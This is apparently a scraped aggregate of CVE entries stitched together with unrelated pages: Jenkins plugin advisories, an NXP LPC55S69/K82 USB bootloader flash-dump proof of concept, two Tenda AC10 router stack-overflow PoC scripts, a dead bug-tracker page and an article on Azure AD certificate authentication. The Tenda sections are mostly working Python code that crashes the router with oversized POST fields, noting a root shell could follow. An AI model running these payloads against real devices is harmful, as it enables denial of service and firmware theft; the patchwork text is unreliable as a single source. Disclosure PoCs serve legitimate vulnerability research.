Jenkins GitHub Plugin 1.34.4 and earlier uses a non-constant time comparison function when checking whether the provided and computed webhook signatures are equal, allowing attackers to use statistical methods to obtain a valid webhook signature.

CVE-2022-36885: Jenkins Security Advisory 2022-07-27

Jenkins Compuware zAdviser API Plugin 1.0.3 and earlier does not restrict execution of a controller/agent message to agents, allowing attackers able to control agent processes to retrieve Java system properties.

CVE-2022-36900: Jenkins Security Advisory 2022-07-27

NXP Kinetis K82 devices have a buffer over-read via a crafted wlength value in a GET Status-Other request during use of USB In-System Programming (ISP) mode. This discloses protected flash memory.

**CVE-2021-40154****LPC55S69 and K82 USB In-System Programming (ISP) Buffer Over Read Vulnerabilities**

POC to test the BootROM vulnerability found in LPC55S69 and K82 Series Revision A2. The vulnerability is fixed in newer devices with newe Revision A3 for LPC55S69.

**Vulnerable Devices:**

**Confirmed:** LPC55S69 and K82 series MCU’s

**Suspected:** other NXP series MCU’s with similar USB ISP stack - Kinetis K Series and RT Series

**Vulnerability Summary:**

A Buffer over read vulnerability was observed in the USB In-system programming (ISP) mode of NXP LPC55s69 and Kinetis K82 Microcontroller series. When exploited, the vulnerability allows an attacker to read 16KB (LPC55S69) and 64KB (K82) of data from protected flash memory.

**Technical Details:**

NXP LPC55S69 and K82 MCUs provide In-System Programming (ISP) modes for field update of the MCU’s firmware using peripherals such as USB, SPI, UART, and I2C. The USP ISP mode provides an embedded host to update firmware through NXP’s documented update commands.

The ISP is part of the LPC55S69 and K82 BootROM, and gets triggered depending on the values of certain register bits, ISP pin, and image header definition. For LPC55S69, the USB HID class is used to download an image of the USB0/1 port and, similarly, for K82 the Kinetis Bootloader in the ROM supports loading data into flash via the USB peripheral as a USB HID class.

Both the LPC55S69 and K82 series IC’s USB ISP use three (3) endpoints, which are listed below:

*   Control (0)
*   Interrupt IN (1)
*   Interrupt OUT (2)

The buffer over read vulnerability was observed for the USB Control endpoint 0, which is used for USB host enumeration.

**Proof of Concept**

**Target 1: LPC55S69**

The buffer over read vulnerability is observed at the GET Descriptor Configuration request from the embedded USB host. An attacker can request up to 16KB of response data, when crafting an USB request to send GET Descriptor Configuration, by modifying the “wlength” value to 65535 bytes. LPC556S9 limits, and resets, when 16KB of data is copied to the USB TX buffer and successfully transmits to the host.

**Device Details:**

Target Dev Board: LPC55S69 – EVK RevA2 USB Host: Ubuntu 20.04 or Raspberry-pi 4 Model B

**Steps to reproduce the vulnerability:**

1.  In LPC55S69 – EVK RevA2 Development board the USB ISP is triggered by pressing the ISP button and reset button.
2.  Connect the USB 1 High speed port to an Ubuntu Laptop or Raspberry-pi.
3.  The LPC board gets detected as USB Composite device as documented by Figure 1.

Figure 1: Ubuntu dmesg utility showing USB device details

    [43295.318228] usb 1-1.4: USB disconnect, device number 95
    [43296.175536] usb 1-1.4: new full-speed USB device number 96 using xhci_hcd
    [43296.397315] usb 1-1.4: New USB device found, idVendor=1fc9, idProduct=0021, bcdDevice= 3.00
    [43296.397331] usb 1-1.4: New USB device strings: Mfr=1, Product=2, SerialNumber=0
    [43296.397337] usb 1-1.4: Product: USB COMPOSITE DEVICE
    [43296.397342] usb 1-1.4: Manufacturer: NXP SEMICONDUCTOR INC.
    [43296.400768] hid-generic 0003:1FC9:0021.0055: hiddev0,hidraw4: USB HID v1.00 Device [NXP SEMICONDUCTOR INC. USB COMPOSITE DEVICE] on usb-0000:00:14.0-1.4/input0
    

4.  Connect an USB analyser in between the target board and PC, or use the Linux kernel module “usbmon” to capture USB packets:

*   If using USBmon in Ubuntu, run this command “sudo modprobe usbmon”.
*   While using “lsusb”, note the bus and device address.
*   Run “sudo wireshark”, connect to the USBMON1/2 interface with reference to the bus number from “lsusb”.

5.  In Wireshark, filter the USB device address with reference to the bus number from “lsusb”.
6.  Run the Proof of Concept (PoC) “sudo python3 LPC\_USB.py” in Ubuntu. In order to successfully execute Python script, below requirements are needed in the USB host PC: a. Install Python 3+ b. Install the “pyusb” module

7.  Verify the buffer overflow by checking the request and response from the USB traces, as documented by Figure 2; Figure 3 shows, instead, the USB analyser trace. The USB response would be 4KB.

![Figure 2](https://github.com/Xen1thLabs-AE/CVE-2021-40154/raw/main/wireshark.png)

![Figure 3](https://github.com/Xen1thLabs-AE/CVE-2021-40154/raw/main/usb_trace.png)

**Note 1:** The buffer over read of 4KB can be requested in Ubuntu system due to the restriction of Libusb “MAX\_CTRL\_BUFFER\_LENGTH”. This can be modified in a Raspberry-pi system and 16KB can be requested. Attached firmware “LPC.bin” retrieved from the LPC55s69-EVK board using a raspberry-pi 4 model b.

If you would like to issue requests greater than 4KB, use this awesome script created by Horac on a Raspi and run the POC with wlength changed to 65535(0xffff).

**Target 2: Kinetis K82**

The buffer over read vulnerability is observed at the GET Status-Other request from an embedded USB host. An attacker can request up to 64KB of response data, when crafting an USB request to send GET status-Other, by modifying the “wlength” value to 65535 bytes. The K82 USB device successfully sends 64KB of data.

**Device Details:**

Target Dev Board: FRDM-K82F USB Host: Ubuntu Laptop or Raspberry-pi

**Note 1:** The buffer over read of 4KB can be requested in Ubuntu system due to the restriction of Libusb “MAX\_CTRL\_BUFFER\_LENGTH”. This can be modified in a Raspberry-pi and 64KB can be requested.

**Note 2:** the vulnerability in K82 is reproduced only when the USB requests for GET status-Device, Interface, Endpoint, and other has to happen subsequently in order to trigger the vulnerability. This can be achieved by running the developed PoC scripts after multiple ISP resets.

If you would like to issue requests greater than 4KB, use this awesome script created by Horac on a Raspi and run the POC with wlength changed to 65535(0xffff).

CVE-2021-44479: GitHub - Xen1thLabs-AE/CVE-2021-40154: POC to test the BootROM vulnerability found in LPC55S69 and K82 Series

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetClientState.

Permalink

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetClientState， The two variables ul\_speed and dl\_speed are user-controllable and will be spliced into the buff by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'limitEn=1&deviceId=a&limitSpeedUp=a&limitSpeed=' + p1

p3 \= b"POST /goform/SetClientState" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42164: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetFirewallCfg.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetFirewallCfg, firewall\_value is controllable and will be copied to firewall\_buf by strcpy. It is worth noting that there is no size check, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'firewallEn=' + p1

p3 \= b"POST /goform/SetFirewallCfg" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42167: IOT_Vul/readme.md at main · z1r00/IOT_Vul

A missing permission check in Jenkins Apprenda Plugin 2.2.0 and earlier allows users with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

**Jenkins Apprenda Plugin has Missing Authorization vulnerability**

Moderate severity GitHub Reviewed Published Sep 22, 2022 • Updated Sep 23, 2022

GHSA-52v4-wxrx-gjjm: Jenkins Apprenda Plugin has Missing Authorization vulnerability

The parent process would not properly check whether the Speech Synthesis feature is enabled, when receiving instructions from a child process. This vulnerability affects Thunderbird < 91.9.

Sorry, I can't find "_1764778?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-29913: Invalid Bug ID

A missing permission check in Jenkins XP-Dev Plugin 1.0 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to an attacker-specified repository.

**Missing Authorization in Jenkins XP-Dev Plugin**

Moderate severity GitHub Reviewed Published Nov 16, 2022 • Updated Nov 21, 2022

GHSA-x9wp-gfrr-p5rp: Missing Authorization in Jenkins XP-Dev Plugin

Microsoft added certificate-based authentication (CBA) to the Azure Active Directory to help organizations enable phishing-resistant MFA that complies with US federal requirements. The change paves the way for enterprises to migrate their Active Directory implementations to the cloud.

Microsoft has removed a key obstacle facing organizations seeking to deploy phishing-resistant multifactor authentication (MFA) by enabling certificate-based authentication (CBA) in Azure Active Directory.

The release of CBA in Azure AD, announced during last month's Microsoft Ignite conference, promises to pave the way for large enterprises to migrate their on-premises Active Directory implementations to the cloud. It's a move Microsoft is encouraging enterprises to undertake to protect their organizations from phishing attacks.

Further, this week, Microsoft took the first step toward enabling phishing-resistant MFA on employee-owned iOS and Android devices without requiring IT to install user certificates. Specifically, Microsoft on Wednesday issued a preview release of Azure AD with CBA support on mobile devices using security keys from Yubico.

**Meeting Federal Standards**

CBA capability in Azure AD is immediately critical to federal government agencies, which face a March 2024 deadline to deploy phishing-resistant MFA in compliance with US President Joe Biden's 2021 Executive Order (14028) on Improving the Nation's Cybersecurity.

The executive order directs all federal government agencies and those it does business with to move to zero trust architecture (ZTA) security. Phishing-resistant MFA is a requirement detailed in the follow-on guidance, Memorandum MB-22-09, issued early this year by the US Office of Budget and Management (OMB).

OMB's memorandum specifies that all civilian and intelligence agencies implement cloud-based identity architectures resistant to phishing. That means eliminating legacy MFA solutions that attackers can compromise, including SMS and one-time password (OTP) based authentication susceptible to phishing attacks.

SMS phishing attacks, also called "smishing," are fraudulent text messages that appear legitimate, directing victims to enter personal information into a fake website. "Smishing has turned increasingly into a meaningful attack vector; I see it all the time," says Andrew Shikiar, executive director of the FIDO Alliance.

Beyond federal agencies and contractors, preventing phishing from MFA bypass attacks has become crucial to all enterprises. This year, MFA relay attacks have escalated; for example, in the August compromise of Twilio's broadly used MFA service, the attackers prompted unwitting users to share their Okta credentials.

Experts anticipate such attacks will rise next year. "I think social engineering and MFA bypass attacks will continue to grow in 2023, where some other major service providers suffer meaningful breaches like we did this year," Shikiar says.

**Moving From ADFS to Azure AD**

Microsoft emphasized that CBA in Azure AD is critical in paving the way for federal government agencies to comply with the president's executive order. CBA provides a migration path from on-premises Active Directory Federation Services (ADFS) to the cloud-based Azure AD.

Now that CBA is available in Azure AD, organizations can use the cloud-based version of Active Directory to require users to login directly from all Microsoft Office and Dynamics programs and some third-party apps, which will authenticate them with an organization's public key infrastructure (PKI) using X.509 certificates. The X.509 certificate renders applications resistant to phishing because each user and device has its unique certificate.

Until now, organizations choosing to implement CBA in the cloud had to use third-party authentication services to enforce certificate policies. "What Microsoft is doing is removing the hurdle of having to have a separate service, and between you and the cloud, they're supporting that natively," says Derek Hanson, VP of solutions architecture and standards at Yubico.

"This removes the last major blocker for those of you who want to move all of your identities to the cloud," said Joy Chik, president of Microsoft's identity and network access division, during a session at the company's Ignite conference.

Chik emphasized that connecting applications to Azure AD paves the way for retiring on-premises ADFS, which organizations typically use to enable PKI. However, most organizations have relied on ADFS for decades, and migrating to Azure AD is a complex move. Nevertheless, Chik said it is necessary. "ADFS has become a primary attack vector," she said.

Indeed, most enterprises that use X.509 for authentication rely on federated servers — and in most cases, that means ADFS. Doug Simmons, managing director and principal consulting analyst at TechVision Research, estimates that at least 80% to 90% of enterprises use ADFS.

"I really don't know of any organizations that are not using ADFS," Simmons says. Now that CBA is available in Azure AD, Simmons agrees that organizations will begin the process of migrating from ADFS. "I think they will likely make the migration within the next two years," he says.

**Fulfilling the Government Mandates**

During the past year, Chik said that Microsoft has added more than 20 capabilities to ensure that all the critical authentication capabilities in ADFS are available in Azure AD. "Certificate-based authentication is critical for customers in regulated industries," Chik said. But she added, "This includes US federal agencies, which must deploy phishing resistant MFA to comply with White House executive order on cyber security."

Simmons notes that enabling agencies to meet this mandate is critical for Microsoft to retain and expand government deployments, especially agencies that require authentication that complies with the FIPS 140 and FIDO2 standards. "From what I understand, Microsoft needs Azure to stay ahead of the FedGov game or risk being further being overtaken by Google, AWS and others," Simmons explains. "So, this would be necessary to demonstrate said compliance and fully integrated support."

Earlier this year, Microsoft launched Entra, an identity and access management (IAM) platform anchored by Azure Active Directory and using other tools, including Permissions Management, Verified ID, Workload Identities, and Identity Governance.

"With Entra, they are making a significant investment in multi-cloud administrative security," Simmons adds. "Multicloud is key because they realize the world doesn't end with Azure. In fact, most of their customers — and probably all of our customers — have the big three clouds in production. To better secure cross-cloud admin, they need to make strong authentication available to the privileged users, who can be developers and admins. Just supporting phone-based push MFA isn't enough for some organizations, especially when it comes to the US government and defense."

**Bringing Azure AD CBA Support to Mobile Devices**

Microsoft's release this week of the public preview of Azure AD CBA support on iOS and Android devices enables the use of certificates on hardware security keys, initially Yubico's YubiKey. Microsoft's director of identity security Alex Weinert announced the release in a brief blog post.

"With Bring Your Own Device (BYOD) on the rise, this feature will give you the ability to require phishing-resistant MFA on mobile without having to provision certificates on the user's mobile device," Weinert wrote.

Yubico, which led the development of the FIDO authentication standards, worked with Microsoft to enable its YubiKeys, the first FIPS-certified, phishing-resistant authenticator currently available for Azure AD on mobile. Ultimately, contractors and US Department of Defense personnel will be able to embed their DoD common access cards (CAC) and personal identity verification (PIV) cards into their mobile devices.

"CBA is currently the only form of phishing-resistant authentication within Azure that is supported on mobile devices, which is an important factor for an organization when deciding which scheme to adopt," said Yubico solutions architect Erik Parkkonen in a blog post. Besides taking some configuration steps within Azure AD and installing the Microsoft Authenticator app on Android or iOS/iPadOS, users must install the Yubico Authenticator app on mobile devices.

Users must then install their personal identity verification (PIV) credential independent of the Azure solution, Parkkonen noted. Further, administrators can deploy Microsoft's latest Conditional Access authentication strength policies to enforce CBA. Microsoft last week released a preview of the new Conditional Access authentication strength capabilities.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us